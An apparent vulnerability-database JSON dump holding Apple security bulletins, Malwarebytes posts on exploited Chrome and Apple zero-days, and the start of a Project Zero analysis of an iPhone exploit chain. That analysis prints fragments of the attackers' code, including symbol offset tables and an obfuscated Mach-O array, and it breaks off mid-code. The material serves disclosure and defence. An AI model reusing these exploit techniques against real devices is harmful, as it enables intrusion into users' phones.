Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 09, 2023\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-04-10T00:00:00", "type": "apple", "title": "About the security content of macOS Big Sur 11.7.6", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-04-10T00:00:00", "id": "APPLE:D5B90B4C3FFEF1EFC2D895F960EB301D", "href": "https://support.apple.com/kb/HT213725", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T22:08:14", "description": "# About the security content of macOS Monterey 12.6.5\n\nThis document describes the security content of macOS Monterey 12.6.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## macOS Monterey 12.6.5\n\nReleased April 10, 2023\n\n**IOSurfaceAccelerator**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2023-28206: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 31, 2023\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-04-10T00:00:00", "type": "apple", "title": "About the security content of macOS Monterey 12.6.5", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-04-10T00:00:00", "id": "APPLE:17ECDD9D843E3FB37FB8F9A31FE36A99", "href": "https://support.apple.com/kb/HT213724", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T22:08:18", "description": "# About the security content of Safari 16.4.1\n\nThis document describes the security content of Safari 16.4.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## Safari 16.4.1\n\nReleased April 7, 2023\n\n**WebKit**\n\nAvailable for: macOS Big Sur and macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla: 254797\n\nCVE-2023-28205: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 31, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-07T00:00:00", "type": "apple", "title": "About the security content of Safari 16.4.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-07T00:00:00", "id": "APPLE:522AA8B4B44916121871E87266D0A714", "href": "https://support.apple.com/kb/HT213722", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2023-04-12T00:17:10", "description": "On Friday April 7, 2023, Apple released iOS 16.4.1, iPadOS 16.4.1, and macOS 13.3.1 for the iPhone, iPad, and Mac, respectively, and our advice is to install them as soon as possible because all three updates include important security fixes.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has already ordered federal agencies to patch these two security vulnerabilities before May 1st, 2023.\n\nThe updates may already have reached you in your regular update routines, but it doesn't hurt to 
check if your device is at the [latest update level](<https://support.apple.com/en-us/HT201222>). If a Safari update is available for your device, you can get it by updating or upgrading macOS, iOS, or iPadOS.\n\n[How to update your iPhone or iPad.](<https://support.apple.com/en-us/HT204204>)\n\n[How to update macOS on Mac.](<https://support.apple.com/en-us/HT201541>)\n\n## The vulnerabilities\n\nThe [security content of iOS 16.4.1 and iPadOS 16.4.1](<https://support.apple.com/en-us/HT213720>) contains information about two vulnerabilities for which Apple has been made aware of reports that these issues may have been actively exploited.\n\n[CVE-2023-28206](<https://vulners.com/cve/CVE-2023-28206>): an out-of-bounds write issue in IOSurfaceAccelerator was addressed with improved input validation. The issue that could allow an app to execute arbitrary code with kernel privileges is fixed in iOS 15.7.5 and iPadOS 15.7.5, macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Big Sur 11.7.6, macOS Ventura 13.3.1.\n\nIOSurfaceAccelerator is an object that manages hardware accelerated transfers/scales between IOSurfaces in the IOSurface framework. The IOSurface framework provides a framebuffer object suitable for sharing across process boundaries. It is commonly used to allow applications to move complex image decompression and draw logic into a separate process to enhance security.\n\nAn out-of-bounds write can occur when a program writes outside the bounds of an allocated area of memory, potentially leading to a crash or arbitrary code execution. This can happen when the size of the data written is larger than the size of the allocated memory area, when the data is written to an incorrect location within the memory area, or when the program incorrectly calculates the size or location of the data to be written. In this case an attacker can use it to elevate the privileges of a malicious app. 
For those interested, a proof-of-concept (PoC) has been [published](<https://gist.github.com/LinusHenze/728db96a836b6817ecb727cfbde606b3>) for this vulnerability.\n\n[CVE-2023-28205](<https://vulners.com/cve/CVE-2023-28205>): a use after free (UAF) issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1.\n\nUAF is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program's operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. In this case, when the vulnerability is exploited, processing maliciously crafted web content may lead to arbitrary code execution.\n\nWebKit is Apple's web rendering engine. In other words, WebKit is the browser engine that powers Safari and other apps.\n\nThe [security content of macOS Ventura 13.3.1](<https://support.apple.com/en-us/HT213721>) covers the same two vulnerabilities and Apple has also released a new Safari 16.4.1 update for macOS Monterey and macOS Big Sur, which likely addresses the WebKit vulnerability.\n\n* * *\n\nMalwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? 
Get a free trial below.\n\n[TRY NOW](<https://www.malwarebytes.com/business/contact-us/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-11T03:00:00", "type": "malwarebytes", "title": "Apple releases emergency updates for two known-to-be-exploited vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-04-11T03:00:00", "id": "MALWAREBYTES:B487BF5B3E6EA5BB5C7CABAF0083C8A5", "href": "https://www.malwarebytes.com/blog/news/2023/04/apple-releases-emergency-updates-for-two-known-to-be-exploited-vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-04-24T16:18:09", "description": "In a recent [security advisory](<https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html>), Google says it patched a high-severity zero-day security flaw in its Chrome browser--[the first in 2023](<https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-first-zero-day-of-2023/>)--currently being exploited in the wild by threat actors. The company urges all its Windows, Mac, and Linux users to update to version **112.0.5615.121** immediately, as this flaw is present in Chrome versions before this one. Updating your browser can be done manually or automatically.\n\nIf you use other Chromium-based browsers, you may need to update them as well.\n\nThe vulnerability, tracked as [**CVE-2023-2033**](<https://nvd.nist.gov/vuln/detail/CVE-2023-2033>), is exploitable when a user visits a malicious webpage using an unpatched Chrome browser. 
The page could run arbitrary code in the browser, potentially leading to your computing device being hijacked. Google knows that exploit code for this flaw already exists and is circulating in the wild.\n\nCVE-2023-2033 is a [type-confusion](<https://cwe.mitre.org/data/definitions/843.html>) bug in [V8](<https://v8.dev/>), Google's open-source JavaScript and WebAssembly engine. As with other zero-day patch announcements, the company supplied little to no detail on how attackers could exploit this flaw. However, we know that attacks on V8, although uncommon, are considered among the most dangerous. Exploiting a weakness in V8 typically leads to a browser crashing.\n\n\"Access to bug details and links may be kept restricted until a majority of users are updated with a fix,\" says Google in the advisory. \"We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\"\n\nGoogle is giving all its Chrome users enough time to update to the latest version before technical details are released.\n\n## How to manually update Chrome\n\nGoogle Chrome typically updates automatically. However, it's worth double checking. To check if your browser is up to date:\n\n * Click the three vertical dots at the upper right-hand side of the URL bar.\n * Select Help > About Google Chrome.\n\nSimply doing this should trigger Chrome to update. Once done, the browser will ask you to relaunch. Click the button to confirm and complete the update process.\n\nGoogle never requires users to manually download and install a separate file to update Chrome. Scammers and threat actors have used this tactic many times in the past, and, for a time, it worked. 
Now and then, this tactic is [adopted in a malicious campaign](<https://www.malwarebytes.com/blog/news/2023/04/fake-chrome-updates-spread-malware>), to catch those who aren't familiar with how Chrome works or how Google updates its products.\n\nStay safe!\n\n* * *\n\nMalwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.\n\n[TRY NOW](<https://www.malwarebytes.com/business/contact-us/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-17T04:00:00", "type": "malwarebytes", "title": "Update Chrome now! Google patches actively exploited flaw", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-17T04:00:00", "id": "MALWAREBYTES:4626DAC5E564F84D8120875767C1EE7C", "href": "https://www.malwarebytes.com/blog/news/2023/04/update-chrome-now-google-patches-actively-exploited-flaw", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-02T20:29:42", "description": "Google has [announced](<https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html>) an update for Chrome that fixes an in-the-wild exploit. Chrome Stable channel has been updated to 107.0.5304.87 for Mac and Linux, and 107.0.5304.87/.88 for Windows.\n\nThe vulnerability at hand is described as a type confusion issue in the V8 Javascript engine.\n\n## Mitigation\n\nIf you're a Chrome user on Windows, Mac, or Linux, you should update as soon as possible. 
Most of the time, the easiest way to update Chrome is to do nothing--it should update itself automatically, using the same method as outlined below but without your involvement. However, if something goes wrong--such as an extension blocking the update--or if you never close your browser, you can end up lagging behind on your updates.\n\nSo, it doesn't hurt to check now and again. And now would be a good time, given the severity of the vulnerabilities in this batch.\n\nMy preferred method is to have Chrome open the page **chrome://settings/help**, which you can also find by clicking **Settings > About Chrome**.\n\nUpdating Chrome\n\nIf there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.\n\nChrome is up to date\n\nAfter the update the version should be 107.0.5304.87 or later.\n\n## CVE-2022-3723\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe one that prompted the out-of-band update was [CVE-2022-3723](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3723>), a type confusion issue in Chrome's V8 JavaScript engine. A remote attacker could exploit this vulnerability to trigger data manipulation on the targeted system.\n\nType confusion is possible when a piece of code doesn't verify the type of object that is passed to it. The program allocates or initializes an object using one type, but it later accesses it using a type that is incompatible with the original. 
Details about the vulnerability will not be released before everyone has had a chance to update, but it seems that in this case the manipulation with an unknown input can lead to privilege escalation.\n\nThe V8 engine is a very important component within Chrome that's used to process JavaScript commands. A [very similar vulnerability](<https://www.malwarebytes.com/blog/news/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild>) was found in March of 2022. This was also a type confusion issue in the V8 engine, which turned out to affect other Chromium based browsers as well. So keep an eye out for updates on any other Chromium based browser you may be using, such as Edge.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-28T21:45:00", "type": "malwarebytes", "title": "A Chrome fix for an in-the-wild exploit is out\u2014Check your version", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2022-10-28T21:45:00", "id": "MALWAREBYTES:CBCD880E5209A5267DCBEB5FB041C435", "href": "https://www.malwarebytes.com/blog/news/2022/10/update-chrome-now-and-fix-a-vulnerability-with-an-existing-exploit-for-it", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-06T00:03:08", "description": "On Friday, Google [announced](<https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop.html>) the release of a new version of its Chrome browser that includes a security fix for a zero-day tracked as [CVE-2022-3075](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3075>). 
As with previous announcements, technical details about the vulnerability won't be released until a certain number of Chrome users have already applied the patch.\n\nGoogle is urging its Windows, Mac, and Linux users to update Chrome to version **105.0.5195.102**.\n\nCVE-2022-3075 is described as an \"[i]nsufficient data validation in Mojo\". According to Chromium documents, Mojo is \"a collection of runtime libraries\" that facilitates interfacing standard, low-level interprocess communication (IPC) primitives. Mojo provides a platform-agnostic abstraction of these primitives, which comprise most of Chrome's code.\n\nAn anonymous security researcher is credited with discovering and reporting the flaw.\n\nCVE-2022-3075 is the sixth zero-day Chrome vulnerability Google had to address. The previous ones were:\n\n * [CVE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>), a Use-after-Free (UAF) vulnerability, which was patched in February\n * [CVE-2022-1096](<https://www.malwarebytes.com/blog/news/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild>), a \"Type Confusion in V8\" vulnerability, which was patched in March\n * [CVE-2022-1364](<https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-zero-day-used-in-attacks/>), a flaw in the V8 JavaScript engine, which was patched in April\n * [CVE-2022-2294](<https://www.malwarebytes.com/blog/news/2022/07/update-now-chrome-patches-another-zero-day-vulnerability>), a flaw in Web Real-Time Communications (WebRTC), which was patched in July\n * [CVE-2022-2856](<https://www.malwarebytes.com/blog/news/2022/08/update-chrome-now-google-issues-patch-for-zero-day-spotted-in-the-wild>), an insufficient input validation flaw, which was patched in August\n\nGoogle Chrome needs minimal oversight as it updates automatically. 
However, if you're in the habit of not closing your browser or have extensions that may hinder Chrome from automatically doing this, please check your browser every now and then.\n\nOnce Chrome notifies you of an available update, don't hesitate to download it. The patch is applied once you relaunch the browser.\n\n\n\nStay safe!", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-05T16:30:00", "type": "malwarebytes", "title": "Zero-day puts a dent in Chrome's mojo", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075"], "modified": "2022-09-05T16:30:00", "id": "MALWAREBYTES:08FDD3DEF41B63F1DEB23C21DCFDB12D", "href": "https://www.malwarebytes.com/blog/news/2022/09/update-chrome-asap-a-new-zero-day-is-already-being-exploited", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-08T16:24:17", "description": "On Friday, December 2, [Google rolled out an out-of-band patch](<https://chromereleases.googleblog.com/2022/12/stable-channel-update-for-desktop.html>) for an actively exploited zero-day vulnerability in its [V8 JavaScript engine](<https://v8.dev/>). The flaw could allow attackers to cause a system crash or execute potentially malicious code.\n\nThat means you'll want to update Chrome to patch against this vulnerability as soon as you can. Do this by navigating to the \"About Chrome\" page on your browser's menu.\n\nIf your Chrome version is 108.0.5359.94 (Mac and Linux) or 108.0.5359.94/.95 (Windows), then you have the latest version. 
If it isn't, click Update Google Chrome.\n\nNote: if you don't have the update option, such as in the case below, some files may be missing from your computer, so it's best to uninstall and reinstall Chrome.\n\nChrome without an update button option\n\nAlso, if you have other Chromium-based browsers you're using, you may need to update them.\n\n## Vulnerability details\n\nThe flaw, tracked as [CVE-2022-4262](<https://nvd.nist.gov/vuln/detail/CVE-2022-4262>), has a severity rating of \"High\" and is a type confusion bug. If exploited, it could allow remote attackers to trigger [memory corruption](<https://en.wikipedia.org/wiki/Memory_corruption>) (also called heap corruption) using a specially crafted HTML page.\n\nA type confusion bug happens when code doesn't verify the object type passed to it, and then uses the object without type-checking. Unfortunately, this bug occurs in the V8 JavaScript engine, Google's open-source JavaScript engine. Attacks on V8 are not common; however, they are considered among the most dangerous.\n\nCVE-2022-4262 is the 4th type confusion bug found this year and the 9th actively exploited zero-day to date.\n\nAs with any zero-day vulnerability Google patches, very little technical detail is provided about the vulnerability. You will also find that online pages for this vulnerability either contain incomplete details or are there as placeholders to be updated with new information in the future. The National Vulnerability Database is currently analyzing this flaw.\n\n* * *\n\n**We don't just report on threats--we remove them**\n\nCybersecurity risks should never spread beyond a headline. 
Keep threats off your devices by [downloading Malwarebytes today](<https://www.malwarebytes.com/for-home>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-05T22:30:00", "type": "malwarebytes", "title": "Update now! Emergency fix for Google Chrome's V8 JavaScript engine zero-day flaw released", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-05T22:30:00", "id": "MALWAREBYTES:4FCBD5A9882474969BB67DE6ECA7A4C7", "href": "https://www.malwarebytes.com/blog/news/2022/12/update-now-emergency-fix-for-google-chromes-v8-javascript-engine-zero-day-flaw-released", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-30T15:40:03", "description": "Google has [urged](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>) its 3 billion+ users to update to Chrome version 99.0.4844.84 for Mac, Windows, and Linux to mitigate a zero-day that is currently being exploited in the wild. 
This is in response to a bug reported by an anonymous security researcher last week.\n\nThe flaw, which is tracked as [CVE-2022-1096](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1096>), is a \"Type Confusion in V8\" and is rated as high severity, meaning that it's necessary for everyone using Chrome to update as quickly as possible because of the damage attackers could cause once they exploit this.\n\nNot much is known about the vulnerability itself or how great the impact would be if exploited, but the unusual release of this patch, which notably addresses just one vulnerability, means that this update shouldn't be ignored.\n\nGoogle is always cautious about releasing more details until the majority of users are updated with a fix. Google says it [may take weeks](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>) before the update reaches its entire user base.\n\n## How to update\n\nThe easiest way to update is to allow Chrome to do it automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.\n\nSo, it doesn't hurt to check now and then. And now would be a good time.\n\nMy preferred method is to have Chrome open the page **chrome://settings/help**, which you can also find by clicking **Settings > About Chrome**.\n\nIf there is an update available, Chrome will notify you and start downloading it. Then it will tell you that all you have to do to complete the update is relaunch the browser.\n\n## Microsoft Edge\n\nMicrosoft has [confirmed](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>) that Edge, a Chromium-based browser, is also affected by this vulnerability. Edge users should urgently update their browsers to version 99.0.1150.55, which is not vulnerable to the flaw.\n\nThe post [Update now! 
Google releases emergency patch for Chrome zero-day used in the wild](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-03-28T13:42:54", "type": "malwarebytes", "title": "Update now! Google releases emergency patch for Chrome zero-day used in the wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2022-03-28T13:42:54", "id": "MALWAREBYTES:3203C761121FB47FC676CC2505B4A9FD", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild/", "cvss": {"score": 0.0, "vector": "NONE"}}], "googleprojectzero": [{"lastseen": "2023-11-09T02:05:57", "description": "### By Ian Beer\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrzpTZ2_H16_OJgFkwuJNmL120zmxWCcdrLlPXp-6x5SsweX8PosbAcKI9Sf8Ad0bYlMfDGwJ0Rz5GdwwEVnek-taAR1voRObiCwl7StIIx2gIHw7zH16AOi-TJRNiyDYKXprNRQNmt6vosLtafQdbjrRgTJB7HLUt_qc1sfCG_sAWZk_wfsfaei3c2-4/s1600/image7.png>)\n\nA graph representation of the sandbox escape NSExpression payload\n\nIn April this year Google's Threat Analysis Group, in collaboration with Amnesty International, discovered an in-the-wild iPhone zero-day exploit chain being used in targeted attacks delivered via malicious link. The chain was reported to Apple under a 7-day disclosure deadline and Apple released [iOS 16.4.1 on April 7, 2023](<https://support.apple.com/en-us/HT213720>) fixing CVE-2023-28206 and CVE-2023-28205.\n\nOver the last few years Apple has been hardening the Safari WebContent (or \"renderer\") process sandbox attack surface on iOS, recently removing the ability for the WebContent process to access GPU-related hardware directly. 
Access to graphics-related drivers is now brokered via a GPU process which runs in a separate sandbox.\n\nAnalysis of this in-the-wild exploit chain reveals the first known case of attackers exploiting the Safari IPC layer to \"hop\" from WebContent to the GPU process, adding an extra link to the exploit chain ([CVE-2023-32409](<https://support.apple.com/en-us/HT213757>)).\n\nOn the surface this is a positive sign: clear evidence that the renderer sandbox was hardened sufficiently that (in this isolated case at least) the attackers needed to bundle an additional, separate exploit. Project Zero has long advocated for attack-surface reduction as an effective tool for improving security and this would seem like a clear win for that approach.\n\nOn the other hand, upon deeper inspection, things aren't quite so rosy. Retroactively sandboxing code which was never designed with compartmentalization in mind is rarely simple to do effectively. In this case the exploit targeted a very basic buffer overflow vulnerability in unused IPC support code for a disabled feature - effectively new attack surface which exists only because of the introduced sandbox. A simple fuzzer targeting the IPC layer would likely have found this vulnerability in seconds.\n\nNevertheless, it remains the case that attackers will still need to exploit this extra link in the chain each time to reach the GPU driver kernel attack surface. 
A large part of this writeup is dedicated to analysis of the NSExpression-based framework the attackers developed to ease this and vastly reduce their marginal costs.\n\n### Setting the stage\n\nAfter gaining native code execution exploiting a [JavaScriptCore Garbage Collection vulnerability](<https://github.com/WebKit/WebKit/commit/c9880de4a28b9a64a5e1d0513dc245d61a2e6ddb>) the attackers perform a find-and-replace on a large ArrayBuffer in JavaScript containing a Mach-O binary to link a number of platform- and version-dependent symbol addresses and structure offsets using hardcoded values:\n\n// find and rebase symbols for current target and ASLR slide:\n\ndt: {\n\nce: false,\n\n[\"16.3.0\"]: {\n\n_e: 0x1ddc50ed1,\n\nde: 0x1dd2d05b8,\n\nue: 0x19afa9760,\n\nhe: 1392,\n\nme: 48,\n\nfe: 136,\n\npe: 0x1dd448e70,\n\nge: 305,\n\nCe: 0x1dd2da340,\n\nPe: 0x1dd2da348,\n\nye: 0x1dd2d45f0,\n\nbe: 0x1da613438,\n\n...\n\n[\"16.3.1\"]: {\n\n_e: 0x1ddc50ed1,\n\nde: 0x1dd2d05b8,\n\nue: 0x19afa9760,\n\nhe: 1392,\n\nme: 48,\n\nfe: 136,\n\npe: 0x1dd448e70,\n\nge: 305,\n\nCe: 0x1dd2da340,\n\nPe: 0x1dd2da348,\n\nye: 0x1dd2d45f0,\n\nbe: 0x1da613438,\n\n// mach-o Uint32Array:\n\nxxxx = new Uint32Array([0x77a9d075,0x88442ab6,0x9442ab8,0x89442ab8,0x89442aab,0x89442fa2,\n\n// deobfuscate xxx\n\n...\n\n// find-and-replace symbols:\n\nxxxx.on(new m(\"0x2222222222222222\"), p.Le);\n\nxxxx.on(new m(\"0x3333333333333333\"), Gs);\n\nxxxx.on(new m(\"0x9999999999999999\"), Bs);\n\nxxxx.on(new m(\"0x8888888888888888\"), Rs);\n\nxxxx.on(new m(\"0xaaaaaaaaaaaaaaaa\"), Is);\n\nxxxx.on(new m(\"0xc1c1c1c1c1c1c1c1\"), vt);\n\nxxxx.on(new 